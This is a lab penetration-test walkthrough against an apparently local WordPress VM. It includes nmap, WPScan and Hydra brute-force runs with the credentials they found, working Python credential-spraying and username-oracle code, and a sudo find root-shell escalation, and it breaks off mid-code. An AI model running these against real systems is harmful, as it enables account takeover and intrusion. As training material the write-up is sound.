Debian machine with WordPress
We start with a scan of the local network to find hosts:
sudo nmap -sn 192.168.0.0/24
sudo arp-scan --interface eth0 --localnet
We find hosts and note them down; in this case we go after 192.168.0.108 with a full-port SYN scan plus version detection and default scripts, skipping host discovery:
sudo nmap -sCV -sS -PN -p- -n --min-rate 5000 192.168.0.108
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-19 17:25 CEST
Nmap scan report for 192.168.0.108
Host is up (0.00028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:1a:e9:21:1b:21:c0:c7:b4:55:54:58:45:7a:29:af (RSA)
| 256 bf:ff:d4:d5:92:58:3e:dd:45:38:fc:3f:12:f1:44:42 (ECDSA)
|_ 256 a0:f0:d7:82:ef:dc:ef:1a:14:88:2e:31:82:b5:61:fc (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open mysql MySQL 5.5.5-10.3.39-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.39-MariaDB-0+deb10u1
| Thread ID: 38
| Capabilities flags: 63486
| Some Capabilities: IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, Support41Auth, SupportsCompression, InteractiveClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, ODBCClient, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: Fmqrj:";@p5U/&q+}Wz!
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:64:68:6A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds
Now we enumerate each service. Several attack vectors are visible (SSH on 22, Apache on 80, MariaDB on 3306); we take them one at a time.
We start with port 80.
The Apache default page is still being served, which should not be the case on a production host; a default install like this tends to leak very useful information such as users, passwords and directories.
Let's run a directory scan:
dirb http://192.168.0.108
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Aug 19 17:30:43 2023
URL_BASE: http://192.168.0.108/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.108/ ----
==> DIRECTORY: http://192.168.0.108/admin/
==> DIRECTORY: http://192.168.0.108/Downloads/
+ http://192.168.0.108/index.html (CODE:200|SIZE:10701)
+ http://192.168.0.108/phpinfo.php (CODE:200|SIZE:86447)
+ http://192.168.0.108/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.0.108/wordpress/
---- Entering directory: http://192.168.0.108/admin/ ----
+ http://192.168.0.108/admin/ChangeLog (CODE:200|SIZE:71006)
==> DIRECTORY: http://192.168.0.108/admin/doc/
==> DIRECTORY: http://192.168.0.108/admin/examples/
+ http://192.168.0.108/admin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.0.108/admin/index.php (CODE:200|SIZE:18391)
==> DIRECTORY: http://192.168.0.108/admin/js/
==> DIRECTORY: http://192.168.0.108/admin/libraries/
+ http://192.168.0.108/admin/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://192.168.0.108/admin/locale/
+ http://192.168.0.108/admin/README (CODE:200|SIZE:1520)
+ http://192.168.0.108/admin/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.0.108/admin/setup/
==> DIRECTORY: http://192.168.0.108/admin/sql/
==> DIRECTORY: http://192.168.0.108/admin/templates/
==> DIRECTORY: http://192.168.0.108/admin/themes/
==> DIRECTORY: http://192.168.0.108/admin/tmp/
==> DIRECTORY: http://192.168.0.108/admin/vendor/
---- Entering directory: http://192.168.0.108/Downloads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/ ----
+ http://192.168.0.108/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-includes/
+ http://192.168.0.108/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.0.108/admin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/examples/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/setup/ ----
+ http://192.168.0.108/admin/setup/index.php (CODE:200|SIZE:1002)
==> DIRECTORY: http://192.168.0.108/admin/setup/lib/
==> DIRECTORY: http://192.168.0.108/admin/setup/themes/
---- Entering directory: http://192.168.0.108/admin/sql/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/tmp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/ ----
+ http://192.168.0.108/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/includes/
+ http://192.168.0.108/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/user/
---- Entering directory: http://192.168.0.108/wordpress/wp-content/ ----
+ http://192.168.0.108/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.0.108/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/admin/setup/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/network/ ----
+ http://192.168.0.108/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.108/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.0.108/wordpress/wp-admin/user/ ----
+ http://192.168.0.108/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.108/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.0.108/wordpress/wp-content/plugins/ ----
+ http://192.168.0.108/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.0.108/wordpress/wp-content/themes/ ----
+ http://192.168.0.108/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.0.108/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.108/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Aug 19 17:31:23 2023
DOWNLOADED: 46120 - FOUND: 21
We have found a WordPress install, its wp-admin, a phpMyAdmin under /admin/ (the ChangeLog, libraries/, setup/ and sql/ layout gives it away), a phpinfo.php that dumps the PHP configuration, and several listable directories (Downloads/, admin/tmp/, wp-content/uploads/).
We also have the WordPress login panel at /wordpress/wp-login.php.
Let's run a quick automated, but very noisy, WordPress scan with WPScan, enumerating users (-e u):
wpscan --url http://192.168.0.108/wordpress/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.0.108/wordpress/ [192.168.0.108]
[+] Started: Sat Aug 19 17:45:34 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.0.108/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.0.108/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.0.108/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.0.108/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.0.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.0.108/wordpress/, Match: 'WordPress 6.2.2'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] vagrant
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Aug 19 17:46:05 2023
[+] Requests Done: 62
[+] Cached Requests: 4
[+] Data Sent: 15.437 KB
[+] Data Received: 12.844 MB
[+] Memory used: 153.324 MB
[+] Elapsed time: 00:00:31
WPScan enumerated four users: hugo, admin, philip and vagrant. It found them by requesting /?author=N and reading the redirect to /author/<name>/, then confirmed each one through the different error messages wp-login.php returns for a known and an unknown username.
Let's try a password attack with WPScan; with no -U given it reuses the users it just enumerated, and because xmlrpc.php is enabled it sends the attempts over XML-RPC instead of the login form:
wpscan --url http://192.168.0.108/wordpress/ --passwords /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.0.108/wordpress/ [192.168.0.108]
[+] Started: Sat Aug 19 17:54:47 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.0.108/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.0.108/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.0.108/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.0.108/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.0.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.0.108/wordpress/, Match: 'WordPress 6.2.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] vagrant
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Xmlrpc against 4 user/s
[SUCCESS] - philip / password
[SUCCESS] - admin / password
[SUCCESS] - hugo / 987654321
^C Trying vagrant / misty123 Time: 00:04:13 < > (11455 / 57377660) 0.01% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: philip, Password: password
| Username: admin, Password: password
| Username: hugo, Password: 987654321
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Aug 19 17:59:44 2023
[+] Requests Done: 11622
[+] Cached Requests: 40
[+] Data Sent: 6.1 MB
[+] Data Received: 6.798 MB
[+] Memory used: 257.57 MB
[+] Elapsed time: 00:04:57
Scan Aborted: Canceled by User
Before we aborted the attack, WPScan had found three valid credential pairs: philip:password, admin:password and hugo:987654321. Note that it found no plugins through its passive enumeration and could not detect the theme, so there is nothing to look up there yet.
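To see what "password attack on Xmlrpc" means in practice, here is an added example (my own code, not part of the original write-up, WPScan or WordPress) that packs many wp.getUsersBlogs credential checks into a single system.multicall request, the way WPScan and Metasploit's wordpress_xmlrpc_login module do. It assumes the xmlrpc.php URL reported by the scan; the server response it parses is constructed inline so the parsing runs offline.

```python
import urllib.request
import xmlrpc.client

# Endpoint reported by WPScan above (assumption: still reachable at this path).
XMLRPC_URL = "http://192.168.0.108/wordpress/xmlrpc.php"


def build_multicall(candidates):
    """Pack one wp.getUsersBlogs(user, password) call per candidate into a system.multicall body.

    wp.getUsersBlogs needs nothing but credentials, so it is the usual login oracle
    over XML-RPC; system.multicall lets a single POST test the whole batch.
    """
    calls = [{"methodName": "wp.getUsersBlogs", "params": [user, password]}
             for user, password in candidates]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall(response_xml, candidates):
    """Return the candidate pairs whose call succeeded (anything that is not a fault struct)."""
    (results,), _ = xmlrpc.client.loads(response_xml)
    valid = []
    for pair, result in zip(candidates, results):
        # Bad credentials come back as {"faultCode": 403, "faultString": "Incorrect username or password."};
        # a hit is a one-element array wrapping the user's blog list.
        if isinstance(result, dict) and "faultCode" in result:
            continue
        valid.append(pair)
    return valid


def spray(candidates, chunk=50, url=XMLRPC_URL):
    """Send candidates in chunks of `chunk` pairs per request (network; not exercised offline)."""
    found = []
    for start in range(0, len(candidates), chunk):
        batch = candidates[start:start + chunk]
        req = urllib.request.Request(url, data=build_multicall(batch).encode(),
                                     headers={"Content-Type": "text/xml"})
        with urllib.request.urlopen(req, timeout=15) as resp:
            found.extend(parse_multicall(resp.read(), batch))
    return found


# Constructed server answer for SAMPLE_CANDIDATES: first pair valid, second rejected.
SAMPLE_CANDIDATES = [("admin", "password"), ("admin", "123456")]
SAMPLE_RESPONSE = xmlrpc.client.dumps((
    [
        [[{"isAdmin": True, "blogid": "1", "blogName": "wordpress",
           "url": "http://localhost/wordpress/", "xmlrpc": XMLRPC_URL}]],
        {"faultCode": 403, "faultString": "Incorrect username or password."},
    ],
), methodresponse=True)

if __name__ == "__main__":
    print(parse_multicall(SAMPLE_RESPONSE, SAMPLE_CANDIDATES))  # [('admin', 'password')]
```

One POST can carry hundreds of pairs, so a rate limit that only counts requests to wp-login.php never triggers. Defensively, disabling XML-RPC altogether (the xmlrpc_enabled filter, or a deny rule for xmlrpc.php in Apache) or at least removing system.multicall through the xmlrpc_methods filter closes this off.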
WhatWeb also gives us useful information: it reads the meta generator tag and identifies Elementor 3.13.4 on top of WordPress 6.2.2, a plugin that WPScan's passive plugin enumeration missed:
whatweb http://192.168.0.108/wordpress
http://192.168.0.108/wordpress [301 Moved Permanently] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)],
IP[192.168.0.108], RedirectLocation[http://192.168.0.108/wordpress/], Title[301 Moved Permanently]
http://192.168.0.108/wordpress/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)],
IP[192.168.0.108], MetaGenerator[Elementor 3.13.4; features: e_dom_optimization, e_optimized_assets_loading, e_optimized_css_loading,
a11y_improvements, additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-swap,WordPress 6.2.2],
Script, UncommonHeaders[link], WordPress[6.2.2]
Let's also brute-force the login form itself with Hydra. In http-post-form the third field is the condition: with S=<text> an attempt counts as a success when the text appears in the response (a successful WordPress login answers with a 302 redirect to wp-admin); without the S= prefix the text is treated as a failure marker instead:
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.0.108 http-post-form '/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:S=302'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 18:06:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:1/p:1009), ~64 tries per task
[DATA] attacking http-post-form://192.168.0.108:80/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:302
[80][http-post-form] host: 192.168.0.108 login: admin password: password
[80][http-post-form] host: 192.168.0.108 login: admin password: password
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 18:06:38
If the form instead answers with an "usuario invalido" (invalid user) message, use a failure condition so that any response containing that text is treated as a failed attempt; the text has to appear verbatim in the response body, so copy it exactly as the site prints it:
'/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:F=usuario invalido'
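WPScan's "Login Error Messages" confirmation earlier and Hydra's S=302 / F=... conditions here rest on the same observation: wp-login.php answers a successful login with a 302 to wp-admin, and otherwise with a 200 page whose error text differs for an unknown username and for a wrong password on a real account. The following added example (my own code, not from the original write-up, WPScan or Hydra) classifies such responses and runs the author-ID enumeration that produced the user list. The HTTP layer is passed in as a callable so the logic can be exercised against constructed responses; the English WordPress error strings are an assumption and must be adapted for a localized site such as this one.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlencode, urlparse

# Default (English) WordPress error strings; a localized site (e.g. Spanish
# "usuario invalido") needs its own patterns here.  (assumption)
UNKNOWN_USER = re.compile(r"is not registered on this site", re.I)
BAD_PASSWORD = re.compile(r"password you entered for the username", re.I)


def classify_login(status, headers, body):
    """Classify one wp-login.php response: 'success', 'valid-user', 'unknown-user' or 'unknown'."""
    location = headers.get("Location", "")
    if status == 302 and "wp-admin" in location:
        return "success"            # the redirect Hydra's S=302 condition matches
    if status == 200 and UNKNOWN_USER.search(body):
        return "unknown-user"       # username oracle: the account does not exist
    if status == 200 and BAD_PASSWORD.search(body):
        return "valid-user"         # username oracle: account exists, password wrong
    return "unknown"


def author_from_redirect(headers):
    """/?author=N redirects to /author/<user_nicename>/ when ID N exists."""
    path = urlparse(headers.get("Location", "")).path
    m = re.search(r"/author/([^/]+)/?$", path)
    return m.group(1) if m else None


def enumerate_author_ids(fetch, base_url, max_id=10):
    """Author-ID brute force as WPScan does it: GET base/?author=N for N = 1..max_id."""
    users = {}
    for n in range(1, max_id + 1):
        status, headers, _ = fetch(f"{base_url}?author={n}")
        if status in (301, 302):
            name = author_from_redirect(headers)
            if name:
                users[n] = name
    return users


def probe_login(post, base_url, user, password):
    """POST one credential pair to wp-login.php and classify the answer."""
    body = urlencode({"log": user, "pwd": password, "wp-submit": "Log In"}).encode()
    return classify_login(*post(f"{base_url}wp-login.php", body))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 302s; the redirect itself is the signal."""
    def redirect_request(self, *args, **kwargs):
        return None


def http(url, data=None):
    """Real transport for fetch/post: (status, headers, body) without following redirects."""
    headers = {"Content-Type": "application/x-www-form-urlencoded"} if data else {}
    req = urllib.request.Request(url, data=data, headers=headers)
    try:
        with urllib.request.build_opener(_NoRedirect).open(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode(errors="replace")


# Constructed responses modelled on the target above, for offline use.
BASE = "http://192.168.0.108/wordpress/"
_AUTHORS = {1: "admin", 2: "hugo", 3: "philip", 4: "vagrant"}


def fake_fetch(url):
    n = int(url.rsplit("=", 1)[1])
    if n in _AUTHORS:
        return 302, {"Location": f"{BASE}author/{_AUTHORS[n]}/"}, ""
    return 404, {}, "<title>Page not found</title>"


def fake_post(url, data):
    form = {k: v[0] for k, v in parse_qs(data.decode()).items()}
    if form["log"] not in _AUTHORS.values():
        return 200, {}, f"<strong>Error:</strong> The username <strong>{form['log']}</strong> is not registered on this site."
    if form["pwd"] != "password":
        return 200, {}, f"<strong>Error:</strong> The password you entered for the username <strong>{form['log']}</strong> is incorrect."
    return 302, {"Location": f"{BASE}wp-admin/"}, ""


if __name__ == "__main__":
    print(enumerate_author_ids(fake_fetch, BASE))                 # {1: 'admin', 2: 'hugo', 3: 'philip', 4: 'vagrant'}
    print(probe_login(fake_post, BASE, "admin", "password"))       # success
```

Against the real host, pass `http` instead of the fake callables. Blanking the error text with the login_errors filter and disabling the author archives removes the username oracle; it does nothing against the 302 condition, which is why a login rate limit or a second factor is the real fix.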
Now the SSH service on port 22:
hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://192.168.0.108
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 18:55:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:2/p:3), ~1 try per task
[DATA] attacking ssh://192.168.0.108:22/
[22][ssh] host: 192.168.0.108 login: debian password: debian
[22][ssh] host: 192.168.0.108 login: vagrant password: vagrant
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 18:56:04
Hydra resumed from the ./hydra.restore file of an earlier session, which is why it reports only 6 login tries (l:2/p:3) instead of the full wordlists. It found debian:debian and vagrant:vagrant, and we log in over SSH as vagrant:
vagrant@debian10:~$ hostname -I
192.168.0.108
vagrant@debian10:~$
The same check can be done from Metasploit with the ssh_login scanner:
msfconsole
=[ metasploit v6.3.27-dev ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can use help to view all
available commands
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) >
Next we look for privilege escalation paths: more users in `/etc/passwd` (`cat /etc/passwd`), cron jobs (`crontab -l`, /etc/crontab, /etc/cron.d), stored passwords, other services, and our sudo rights (`sudo -l`):
sudo -l
Matching Defaults entries for vagrant on debian10:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vagrant may run the following commands on debian10:
(root) NOPASSWD: /usr/bin/find
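vagrant may run /usr/bin/find as root without a password. find's -exec runs whatever command it is given, so this is not a restricted command but a root shell (`sudo find / -exec /bin/sh \; -quit`, the standard GTFOBins entry). Output like this is worth triaging systematically, so here is an added example (my own code, not from the original write-up) that parses `sudo -l` output into rules and flags commands known to spawn a shell. The GTFOBins subset it carries is a constructed table, and the sample input is the output above.

```python
import os
import re

# Commands whose ordinary features execute arbitrary programs, so running them as
# root via sudo is a root shell. Constructed subset of the GTFOBins "sudo" list.
SHELL_CAPABLE = {
    "find":    "find / -exec /bin/sh \\; -quit",
    "vim":     "vim -c ':!/bin/sh'",
    "less":    "less /etc/profile   (then type !/bin/sh)",
    "awk":     "awk 'BEGIN {system(\"/bin/sh\")}'",
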